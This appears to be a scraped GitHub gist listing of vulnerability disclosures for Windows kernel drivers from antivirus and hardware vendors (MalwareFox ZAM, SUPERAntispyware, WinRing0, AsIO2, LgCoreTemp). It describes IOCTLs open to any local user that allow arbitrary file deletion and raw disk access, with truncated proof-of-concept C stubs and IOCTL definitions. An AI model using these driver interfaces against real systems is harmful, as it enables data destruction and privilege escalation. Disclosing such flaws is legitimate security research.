
@hfiref0x
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to these functions are supplied from user mode via the DeviceIoControl parameters. Everything listed here is available to any local user on a machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).

@hfiref0x
hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@hfiref0x
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.
The SaskCallDriver function works with a fixed-size buffer sent from user mode.
This buffer is a structure defined as
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
__int64 __fastcall DrvDispatch(PDEVICE_OBJECT DeviceObject, _IRP *Irp)
{
_IO_STACK_LOCATION *StackLocation;
_IRP *_Irp;
__int64 Id;
StackLocation = Irp->Tail.Overlay.CurrentStackLocation;
_Irp = Irp;
switch ( StackLocation->Parameters.DeviceIoControl.IoControlCode )
{
@hfiref0x
hfiref0x / 0.c
Created February 22, 2020 07:34
IOBit WinRing0 hack-o-rama
#include <windows.h>
#include "ntos.h"
#include <cstdio>
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
@hfiref0x
hfiref0x / asusgio2.c
Created February 19, 2020 14:52
AsIO2
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength)
{
BOOL bResult = FALSE;
IO_STATUS_BLOCK ioStatus;
@hfiref0x
hfiref0x / lg.c
Created February 18, 2020 03:33
Logitech LgCoreTemp.sys Features
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define LG_DEVICE_TYPE (DWORD)0xC350
#define LG_READVALUE (DWORD)0x800
#define LG_READREFCOUNT (DWORD)0x801
#define LG_READMSR (DWORD)0x821
#define IOCTL_LG_READVALUE \
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_READMSR (DWORD)0x816
#define IOCTL_WINIO_READMSR \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_READMSR, METHOD_BUFFERED, FILE_ANY_ACCESS)
#include "ntos.h"
#define GLCKIO_DEVICE_TYPE (DWORD)0x8010 //same as WinIO/MsIo and all clones based on this bugfest code
#define GLCKIO_REGISTER_FUNCID (DWORD)0x818
#define GLCKIO_READMSR (DWORD)0x816
#define IOCTL_GKCKIO_REGISTER \
CTL_CODE(GLCKIO_DEVICE_TYPE, GLCKIO_REGISTER_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS)